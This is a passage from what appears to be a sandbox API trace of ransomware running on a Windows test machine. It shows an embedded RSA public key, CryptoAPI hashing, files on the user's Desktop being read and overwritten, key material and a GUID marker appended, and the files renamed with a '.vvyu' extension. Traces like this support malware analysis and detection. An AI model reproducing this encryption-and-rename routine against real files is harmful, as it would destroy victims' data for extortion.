KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0183.383] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0183.384] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0183.384] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0183.384] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0183.384] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0183.384] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0183.384] GetLastError () returned 0x0 [0183.384] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0183.384] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0183.385] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0183.385] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0183.385] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0183.385] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0183.385] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0183.385] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0183.385] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0183.385] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x161f0) returned 0x2d43778 [0183.386] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0183.386] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0183.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2c4afd0 [0183.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0183.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d2fc98 [0183.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0183.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30838 [0183.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e648 [0183.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d307f0 [0183.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e678 [0183.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e6a8 [0183.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e750 [0183.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e6c0 [0183.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0183.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x6d5c88 [0183.387] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6d5c88, Size=0x218) returned 0x2d36670 [0183.387] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d36890 [0183.387] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e6a8 | out: hHeap=0x6a0000) returned 1 [0183.387] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e6c0 | out: hHeap=0x6a0000) returned 1 [0183.387] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e750 | out: hHeap=0x6a0000) returned 1 [0183.387] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0183.387] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d36890 | out: hHeap=0x6a0000) returned 1 [0183.387] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e750 [0183.387] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0183.387] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e6c0 [0183.388] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0183.388] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2c4e6a8 [0183.388] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0183.388] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0183.388] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0183.388] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c98 [0183.388] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0183.388] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0183.388] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0183.388] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0183.388] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0183.388] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e6c0 | out: hHeap=0x6a0000) returned 1 [0183.388] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0183.389] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e6a8 | out: hHeap=0x6a0000) returned 1 [0183.389] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0183.389] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0183.389] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e750 | out: hHeap=0x6a0000) returned 1 [0183.389] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0183.389] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0183.389] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d36670 | out: hHeap=0x6a0000) returned 1 [0183.389] GetCurrentThreadId () returned 0x264 [0183.389] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0183.389] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x6ce140 [0183.389] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0183.390] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0183.390] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2c84da8 [0183.390] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0183.390] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0183.390] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0183.390] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.390] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.390] GetCurrentThreadId () returned 0x264 [0183.390] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.390] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.390] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0183.390] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.390] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.391] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0183.391] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0183.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0183.391] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c828a8 [0183.391] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0183.391] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0183.391] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0183.391] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e750 [0183.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0183.391] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0183.391] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0183.391] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0183.391] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0183.391] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0183.391] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0183.391] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0183.392] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e6a8 [0183.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0183.392] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0183.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0183.392] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0183.392] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0183.392] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0183.392] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0183.392] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e6c0 [0183.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0183.392] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0183.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0183.392] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e690 [0183.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0183.392] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e768 [0183.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0183.392] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0183.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0183.392] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e738 [0183.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0183.392] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e6d8 [0183.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0183.392] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e780 [0183.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e6d8 | out: hHeap=0x6a0000) returned 1 [0183.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e6d8 [0183.393] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e738 | out: hHeap=0x6a0000) returned 1 [0183.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0183.393] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0183.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0183.393] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0183.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0183.393] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e6a8 | out: hHeap=0x6a0000) returned 1 [0183.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e6a8 [0183.393] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0183.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d36670 [0183.393] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e750 | out: hHeap=0x6a0000) returned 1 [0183.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0183.393] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e780 | out: hHeap=0x6a0000) returned 1 [0183.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d36880 [0183.393] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0183.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0183.393] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0183.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0183.393] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e6a8 | out: hHeap=0x6a0000) returned 1 [0183.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d36a98 [0183.394] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0183.394] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0183.394] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0183.394] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0183.394] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0183.395] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0183.395] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0183.395] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0183.396] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d36880 | out: hHeap=0x6a0000) returned 1 [0183.396] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d36a98 | out: hHeap=0x6a0000) returned 1 [0183.397] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0183.397] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0183.397] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e6d8 | out: hHeap=0x6a0000) returned 1 [0183.397] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0183.397] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e768 | out: hHeap=0x6a0000) returned 1 [0183.397] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0183.397] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e6c0 | out: hHeap=0x6a0000) returned 1 [0183.397] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e690 | out: hHeap=0x6a0000) returned 1 [0183.398] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84da8 | out: hHeap=0x6a0000) returned 1 [0183.398] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0183.398] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0183.398] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e678 | out: hHeap=0x6a0000) returned 1 [0183.399] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d307f0 | out: hHeap=0x6a0000) returned 1 [0183.399] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d36670 | out: hHeap=0x6a0000) returned 1 [0183.400] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0183.400] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0183.400] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0183.400] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0183.400] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0183.400] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0183.401] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c98 | out: hHeap=0x6a0000) returned 1 [0183.401] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc98 | out: hHeap=0x6a0000) returned 1 [0183.401] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0183.402] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4afd0 | out: hHeap=0x6a0000) returned 1 [0183.402] WriteFile (in: hFile=0x584, lpBuffer=0x2d43778*, nNumberOfBytesToWrite=0x161e8, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d43778*, lpNumberOfBytesWritten=0x30ffb14*=0x161e8, lpOverlapped=0x0) returned 1 [0183.403] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d43778 | out: hHeap=0x6a0000) returned 1 [0183.403] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x161ed, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0183.403] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0183.404] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0183.404] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0183.404] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d36670 [0183.404] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d36670, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0183.404] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d36aa0 [0183.404] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d36670 | out: hHeap=0x6a0000) returned 1 [0183.405] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0183.405] WriteFile (in: hFile=0x584, lpBuffer=0x2d36aa0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d36aa0*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0183.405] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d36aa0 | out: hHeap=0x6a0000) returned 1 [0183.405] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0183.406] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0183.406] CloseHandle (hObject=0x584) returned 1 [0183.408] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c828a8 [0183.408] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x860) returned 0x2d36670 [0183.408] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0183.408] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\B8R3y.xlsx" (normalized: "c:\\users\\keecfmwgj\\desktop\\b8r3y.xlsx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\B8R3y.xlsx.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\b8r3y.xlsx.vvyu")) returned 1 [0183.411] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d36670 | out: hHeap=0x6a0000) returned 1 [0183.411] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0183.411] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0183.414] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6ff30 | out: hHeap=0x6a0000) returned 1 [0183.414] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x536f3cf0, ftCreationTime.dwHighDateTime=0x1d8a1f8, ftLastAccessTime.dwLowDateTime=0x949ace0, ftLastAccessTime.dwHighDateTime=0x1d8a389, ftLastWriteTime.dwLowDateTime=0x949ace0, ftLastWriteTime.dwHighDateTime=0x1d8a389, nFileSizeHigh=0x0, nFileSizeLow=0x7e1c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BnBjzEzhtTp-mHA.png", cAlternateFileName="BNBJZE~1.PNG")) returned 1 [0183.414] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d307f0 [0183.414] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6ff30 [0183.415] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d307f0 | out: hHeap=0x6a0000) returned 1 [0183.415] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\BnBjzEzhtTp-mHA.png") returned=".png" [0183.415] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\BnBjzEzhtTp-mHA.png" (normalized: "c:\\users\\keecfmwgj\\desktop\\bnbjzezhttp-mha.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0183.415] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=32284) returned 1 [0183.415] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0183.418] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x7df6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0183.418] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0183.419] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0183.419] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0183.419] SetFilePointer (in: hFile=0x584, 